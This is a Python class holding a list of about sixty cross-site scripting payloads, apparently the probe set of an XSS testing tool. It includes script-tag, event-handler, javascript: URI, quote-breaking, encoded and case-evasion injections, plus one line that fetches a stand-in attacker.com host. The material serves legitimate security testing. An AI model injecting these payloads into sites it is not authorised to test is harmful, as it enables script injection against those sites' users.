class Payloads:

    PAYLOADS = [

        "<script>alert(1)</script>",
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert(1)>",
        "<img src=1 onerror=alert(document.domain)>",
        "<svg/onload=alert(1)>",
        "<svg><script>alert(1)</script></svg>",
        "<body onload=alert(1)>",
        "\"><script>alert(1)</script>",
        "'><script>alert(1)</script>",
        "<iframe src=javascript:alert(1)>",
        "<details open ontoggle=alert(1)>",
        "<marquee onstart=alert(1)>",
        "<video><source onerror=alert(1)>",
        "<audio src=x onerror=alert(1)>",
        "<object data=javascript:alert(1)>",
        "<embed src=javascript:alert(1)>",
        "<input autofocus onfocus=alert(1)>",
        "<textarea autofocus onfocus=alert(1)>",
        "<select autofocus onfocus=alert(1)>",
        "<keygen autofocus onfocus=alert(1)>",
        "<math href='javascript:alert(1)'>CLICK</math>",
        "<svg><animate onbegin=alert(1) attributeName=x></svg>",
        "<img src=# onmouseover=alert(1)>",
        "<a href=javascript:alert(1)>CLICK</a>",
        "<isindex action=javascript:alert(1)>",
        "<form><button formaction=javascript:alert(1)>CLICK</button>",
        "<table background='javascript:alert(1)'>",
        "<div onpointerover=alert(1)>MOVE</div>",
        "<div onmouseenter=alert(1)>TEST</div>",
        "<div onclick=alert(1)>CLICK</div>",
        "<img dynsrc='javascript:alert(1)'>",
        "<img lowsrc='javascript:alert(1)'>",
        "<base href='javascript:alert(1);//'>",
        "<meta http-equiv='refresh' content='0;javascript:alert(1)'>",
        "<style>@import'javascript:alert(1)';</style>",
        "<link rel=stylesheet href=javascript:alert(1)>",
        "<xml><script>alert(1)</script></xml>",
        "<script>confirm(1)</script>",
        "<script>prompt(1)</script>",
        "<ScRiPt>alert(1)</ScRiPt>",
        "%3Cscript%3Ealert(1)%3C/script%3E",
        "javascript:alert(1)",
        "';alert(1);//",
        "\";alert(1);//",
        "<img src=x onerror=confirm(1)>",
        "<svg/onload=confirm(1)>",
        "<script>console.log(1)</script>",
        "<script>fetch('http://attacker.com')</script>",
        "<iframe srcdoc='<script>alert(1)</script>'>",
        "<video onloadstart=alert(1)>",
        "<audio onloadstart=alert(1)>",
        "<img src=x onerror=prompt(document.domain)>",
        "<svg><set onbegin=alert(1) attributeName=x></svg>",
        "<button formaction=javascript:alert(1)>CLICK</button>",
        "<textarea onfocus=alert(1) autofocus></textarea>",
        "<select onfocus=alert(1) autofocus></select>",
        "<body onpageshow=alert(1)>",
        "<svg><foreignObject><script>alert(1)</script></foreignObject></svg>",
        "<img src=x onerror=eval('alert(1)')>",
        "<script>setTimeout(alert,1000,1)</script>",
        "<script>setInterval(alert,1000,1)</script>"

    ]